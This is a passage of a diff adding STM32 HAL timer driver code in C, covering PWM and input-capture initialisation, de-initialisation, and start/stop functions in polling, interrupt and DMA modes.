(USE_HAL_TIM_REGISTER_CALLBACKS == 1) + /* Reset interrupt callbacks to legacy weak callbacks */ + TIM_ResetCallback(htim); + + if (htim->PWM_MspInitCallback == NULL) + { + htim->PWM_MspInitCallback = HAL_TIM_PWM_MspInit; + } + /* Init the low level hardware : GPIO, CLOCK, NVIC */ + htim->PWM_MspInitCallback(htim); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC and DMA */ + HAL_TIM_PWM_MspInit(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + + /* Set the TIM state */ + htim->State = HAL_TIM_STATE_BUSY; + + /* Init the base time for the PWM */ + TIM_Base_SetConfig(htim->Instance, &htim->Init); + + /* Initialize the DMA burst operation state */ + htim->DMABurstState = HAL_DMA_BURST_STATE_READY; + + /* Initialize the TIM channels state */ + TIM_CHANNEL_STATE_SET_ALL(htim, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET_ALL(htim, HAL_TIM_CHANNEL_STATE_READY); + + /* Initialize the TIM state*/ + htim->State = HAL_TIM_STATE_READY; + + return HAL_OK; +} + +/** + * @brief DeInitializes the TIM peripheral + * @param htim TIM PWM handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_PWM_DeInit(TIM_HandleTypeDef *htim) +{ + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + + htim->State = HAL_TIM_STATE_BUSY; + + /* Disable the TIM Peripheral Clock */ + __HAL_TIM_DISABLE(htim); + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + if (htim->PWM_MspDeInitCallback == NULL) + { + htim->PWM_MspDeInitCallback = HAL_TIM_PWM_MspDeInit; + } + /* DeInit the low level hardware */ + htim->PWM_MspDeInitCallback(htim); +#else + /* DeInit the low level hardware: GPIO, CLOCK, NVIC and DMA */ + HAL_TIM_PWM_MspDeInit(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + + /* Change the DMA burst operation state */ + htim->DMABurstState = HAL_DMA_BURST_STATE_RESET; + + /* Change the TIM channels state */ + TIM_CHANNEL_STATE_SET_ALL(htim, HAL_TIM_CHANNEL_STATE_RESET); + TIM_CHANNEL_N_STATE_SET_ALL(htim, HAL_TIM_CHANNEL_STATE_RESET); + + /* Change TIM state */ + htim->State = HAL_TIM_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(htim); + + return HAL_OK; +} + +/** + * @brief Initializes the TIM PWM MSP. + * @param htim TIM PWM handle + * @retval None + */ +__weak void HAL_TIM_PWM_MspInit(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_PWM_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitializes TIM PWM MSP. + * @param htim TIM PWM handle + * @retval None + */ +__weak void HAL_TIM_PWM_MspDeInit(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_PWM_MspDeInit could be implemented in the user file + */ +} + +/** + * @brief Starts the PWM signal generation. + * @param htim TIM handle + * @param Channel TIM Channels to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_PWM_Start(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + /* Check the TIM channel state */ + if (TIM_CHANNEL_STATE_GET(htim, Channel) != HAL_TIM_CHANNEL_STATE_READY) + { + return HAL_ERROR; + } + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + + /* Enable the Capture compare channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_ENABLE); + + if (IS_TIM_BREAK_INSTANCE(htim->Instance) != RESET) + { + /* Enable the main output */ + __HAL_TIM_MOE_ENABLE(htim); + } + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the PWM signal generation. + * @param htim TIM PWM handle + * @param Channel TIM Channels to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_PWM_Stop(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + /* Disable the Capture compare channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_DISABLE); + + if (IS_TIM_BREAK_INSTANCE(htim->Instance) != RESET) + { + /* Disable the Main Output */ + __HAL_TIM_MOE_DISABLE(htim); + } + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Starts the PWM signal generation in interrupt mode. + * @param htim TIM PWM handle + * @param Channel TIM Channel to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_PWM_Start_IT(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + /* Check the TIM channel state */ + if (TIM_CHANNEL_STATE_GET(htim, Channel) != HAL_TIM_CHANNEL_STATE_READY) + { + return HAL_ERROR; + } + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Enable the TIM Capture/Compare 1 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC1); + break; + } + + case TIM_CHANNEL_2: + { + /* Enable the TIM Capture/Compare 2 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC2); + break; + } + + case TIM_CHANNEL_3: + { + /* Enable the TIM Capture/Compare 3 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC3); + break; + } + + case TIM_CHANNEL_4: + { + /* Enable the TIM Capture/Compare 4 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC4); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Enable the Capture compare channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_ENABLE); + + if (IS_TIM_BREAK_INSTANCE(htim->Instance) != RESET) + { + /* Enable the main output */ + __HAL_TIM_MOE_ENABLE(htim); + } + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + } + + /* Return function status */ + return status; +} + +/** + * @brief Stops the PWM signal generation in interrupt mode. + * @param htim TIM PWM handle + * @param Channel TIM Channels to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_PWM_Stop_IT(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Disable the TIM Capture/Compare 1 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC1); + break; + } + + case TIM_CHANNEL_2: + { + /* Disable the TIM Capture/Compare 2 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC2); + break; + } + + case TIM_CHANNEL_3: + { + /* Disable the TIM Capture/Compare 3 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC3); + break; + } + + case TIM_CHANNEL_4: + { + /* Disable the TIM Capture/Compare 4 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC4); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Disable the Capture compare channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_DISABLE); + + if (IS_TIM_BREAK_INSTANCE(htim->Instance) != RESET) + { + /* Disable the Main Output */ + __HAL_TIM_MOE_DISABLE(htim); + } + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + } + + /* Return function status */ + return status; +} + +/** + * @brief Starts the TIM PWM signal generation in DMA mode. + * @param htim TIM PWM handle + * @param Channel TIM Channels to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @param pData The source Buffer address. + * @param Length The length of data to be transferred from memory to TIM peripheral + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_PWM_Start_DMA(TIM_HandleTypeDef *htim, uint32_t Channel, uint32_t *pData, uint16_t Length) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + /* Set the TIM channel state */ + if (TIM_CHANNEL_STATE_GET(htim, Channel) == HAL_TIM_CHANNEL_STATE_BUSY) + { + return HAL_BUSY; + } + else if (TIM_CHANNEL_STATE_GET(htim, Channel) == HAL_TIM_CHANNEL_STATE_READY) + { + if ((pData == NULL) && (Length > 0U)) + { + return HAL_ERROR; + } + else + { + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + } + } + else + { + return HAL_ERROR; + } + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC1]->XferCpltCallback = TIM_DMADelayPulseCplt; + htim->hdma[TIM_DMA_ID_CC1]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC1]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC1], (uint32_t)pData, (uint32_t)&htim->Instance->CCR1, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + + /* Enable the TIM Capture/Compare 1 DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC1); + break; + } + + case TIM_CHANNEL_2: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC2]->XferCpltCallback = TIM_DMADelayPulseCplt; + htim->hdma[TIM_DMA_ID_CC2]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC2]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC2], (uint32_t)pData, (uint32_t)&htim->Instance->CCR2, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Capture/Compare 2 DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC2); + break; + } + + case TIM_CHANNEL_3: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC3]->XferCpltCallback = TIM_DMADelayPulseCplt; + htim->hdma[TIM_DMA_ID_CC3]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC3]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC3], (uint32_t)pData, (uint32_t)&htim->Instance->CCR3, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Output Capture/Compare 3 request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC3); + break; + } + + case TIM_CHANNEL_4: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC4]->XferCpltCallback = TIM_DMADelayPulseCplt; + htim->hdma[TIM_DMA_ID_CC4]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC4]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC4], (uint32_t)pData, (uint32_t)&htim->Instance->CCR4, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Capture/Compare 4 DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC4); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Enable the Capture compare channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_ENABLE); + + if (IS_TIM_BREAK_INSTANCE(htim->Instance) != RESET) + { + /* Enable the main output */ + __HAL_TIM_MOE_ENABLE(htim); + } + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + } + + /* Return function status */ + return status; +} + +/** + * @brief Stops the TIM PWM signal generation in DMA mode. + * @param htim TIM PWM handle + * @param Channel TIM Channels to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_PWM_Stop_DMA(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Disable the TIM Capture/Compare 1 DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC1); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC1]); + break; + } + + case TIM_CHANNEL_2: + { + /* Disable the TIM Capture/Compare 2 DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC2); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC2]); + break; + } + + case TIM_CHANNEL_3: + { + /* Disable the TIM Capture/Compare 3 DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC3); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC3]); + break; + } + + case TIM_CHANNEL_4: + { + /* Disable the TIM Capture/Compare 4 interrupt */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC4); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC4]); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Disable the Capture compare channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_DISABLE); + + if (IS_TIM_BREAK_INSTANCE(htim->Instance) != RESET) + { + /* Disable the Main Output */ + __HAL_TIM_MOE_DISABLE(htim); + } + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + } + + /* Return function status */ + return status; +} + +/** + * @} + */ + +/** @defgroup TIM_Exported_Functions_Group4 TIM Input Capture functions + * @brief TIM Input Capture functions + * +@verbatim + ============================================================================== + ##### TIM Input Capture functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Initialize and configure the TIM Input Capture. + (+) De-initialize the TIM Input Capture. + (+) Start the TIM Input Capture. + (+) Stop the TIM Input Capture. + (+) Start the TIM Input Capture and enable interrupt. + (+) Stop the TIM Input Capture and disable interrupt. + (+) Start the TIM Input Capture and enable DMA transfer. + (+) Stop the TIM Input Capture and disable DMA transfer. + +@endverbatim + * @{ + */ +/** + * @brief Initializes the TIM Input Capture Time base according to the specified + * parameters in the TIM_HandleTypeDef and initializes the associated handle. + * @note Switching from Center Aligned counter mode to Edge counter mode (or reverse) + * requires a timer reset to avoid unexpected direction + * due to DIR bit readonly in center aligned mode. + * Ex: call @ref HAL_TIM_IC_DeInit() before HAL_TIM_IC_Init() + * @param htim TIM Input Capture handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_IC_Init(TIM_HandleTypeDef *htim) +{ + /* Check the TIM handle allocation */ + if (htim == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + assert_param(IS_TIM_COUNTER_MODE(htim->Init.CounterMode)); + assert_param(IS_TIM_CLOCKDIVISION_DIV(htim->Init.ClockDivision)); + assert_param(IS_TIM_AUTORELOAD_PRELOAD(htim->Init.AutoReloadPreload)); + + if (htim->State == HAL_TIM_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + htim->Lock = HAL_UNLOCKED; + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + /* Reset interrupt callbacks to legacy weak callbacks */ + TIM_ResetCallback(htim); + + if (htim->IC_MspInitCallback == NULL) + { + htim->IC_MspInitCallback = HAL_TIM_IC_MspInit; + } + /* Init the low level hardware : GPIO, CLOCK, NVIC */ + htim->IC_MspInitCallback(htim); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC and DMA */ + HAL_TIM_IC_MspInit(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + + /* Set the TIM state */ + htim->State = HAL_TIM_STATE_BUSY; + + /* Init the base time for the input capture */ + TIM_Base_SetConfig(htim->Instance, &htim->Init); + + /* Initialize the DMA burst operation state */ + htim->DMABurstState = HAL_DMA_BURST_STATE_READY; + + /* Initialize the TIM channels state */ + TIM_CHANNEL_STATE_SET_ALL(htim, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET_ALL(htim, HAL_TIM_CHANNEL_STATE_READY); + + /* Initialize the TIM state*/ + htim->State = HAL_TIM_STATE_READY; + + return HAL_OK; +} + +/** + * @brief DeInitializes the TIM peripheral + * @param htim TIM Input Capture handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_IC_DeInit(TIM_HandleTypeDef *htim) +{ + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + + htim->State = HAL_TIM_STATE_BUSY; + + /* Disable the TIM Peripheral Clock */ + __HAL_TIM_DISABLE(htim); + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + if (htim->IC_MspDeInitCallback == NULL) + { + htim->IC_MspDeInitCallback = HAL_TIM_IC_MspDeInit; + } + /* DeInit the low level hardware */ + htim->IC_MspDeInitCallback(htim); +#else + /* DeInit the low level hardware: GPIO, CLOCK, NVIC and DMA */ + HAL_TIM_IC_MspDeInit(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + + /* Change the DMA burst operation state */ + htim->DMABurstState = HAL_DMA_BURST_STATE_RESET; + + /* Change the TIM channels state */ + TIM_CHANNEL_STATE_SET_ALL(htim, HAL_TIM_CHANNEL_STATE_RESET); + TIM_CHANNEL_N_STATE_SET_ALL(htim, HAL_TIM_CHANNEL_STATE_RESET); + + /* Change TIM state */ + htim->State = HAL_TIM_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(htim); + + return HAL_OK; +} + +/** + * @brief Initializes the TIM Input Capture MSP. + * @param htim TIM Input Capture handle + * @retval None + */ +__weak void HAL_TIM_IC_MspInit(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_IC_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitializes TIM Input Capture MSP. + * @param htim TIM handle + * @retval None + */ +__weak void HAL_TIM_IC_MspDeInit(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_IC_MspDeInit could be implemented in the user file + */ +} + +/** + * @brief Starts the TIM Input Capture measurement. + * @param htim TIM Input Capture handle + * @param Channel TIM Channels to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_IC_Start(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + uint32_t tmpsmcr; + HAL_TIM_ChannelStateTypeDef channel_state = TIM_CHANNEL_STATE_GET(htim, Channel); + HAL_TIM_ChannelStateTypeDef complementary_channel_state = TIM_CHANNEL_N_STATE_GET(htim, Channel); + + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + /* Check the TIM channel state */ + if ((channel_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_state != HAL_TIM_CHANNEL_STATE_READY)) + { + return HAL_ERROR; + } + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + + /* Enable the Input Capture channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_ENABLE); + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the TIM Input Capture measurement. + * @param htim TIM Input Capture handle + * @param Channel TIM Channels to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_IC_Stop(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + /* Disable the Input Capture channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_DISABLE); + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Starts the TIM Input Capture measurement in interrupt mode. + * @param htim TIM Input Capture handle + * @param Channel TIM Channels to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_IC_Start_IT(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tmpsmcr; + + HAL_TIM_ChannelStateTypeDef channel_state = TIM_CHANNEL_STATE_GET(htim, Channel); + HAL_TIM_ChannelStateTypeDef complementary_channel_state = TIM_CHANNEL_N_STATE_GET(htim, Channel); + + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + /* Check the TIM channel state */ + if ((channel_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_state != HAL_TIM_CHANNEL_STATE_READY)) + { + return HAL_ERROR; + } + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Enable the TIM Capture/Compare 1 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC1); + break; + } + + case TIM_CHANNEL_2: + { + /* Enable the TIM Capture/Compare 2 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC2); + break; + } + + case TIM_CHANNEL_3: + { + /* Enable the TIM Capture/Compare 3 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC3); + break; + } + + case TIM_CHANNEL_4: + { + /* Enable the TIM Capture/Compare 4 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC4); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Enable the Input Capture channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_ENABLE); + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + } + + /* Return function status */ + return status; +} + +/** + * @brief Stops the TIM Input Capture measurement in interrupt mode. + * @param htim TIM Input Capture handle + * @param Channel TIM Channels to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_IC_Stop_IT(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Disable the TIM Capture/Compare 1 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC1); + break; + } + + case TIM_CHANNEL_2: + { + /* Disable the TIM Capture/Compare 2 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC2); + break; + } + + case TIM_CHANNEL_3: + { + /* Disable the TIM Capture/Compare 3 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC3); + break; + } + + case TIM_CHANNEL_4: + { + /* Disable the TIM Capture/Compare 4 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC4); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Disable the Input Capture channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_DISABLE); + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + } + + /* Return function status */ + return status; +} + +/** + * @brief Starts the TIM Input Capture measurement in DMA mode. + * @param htim TIM Input Capture handle + * @param Channel TIM Channels to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: 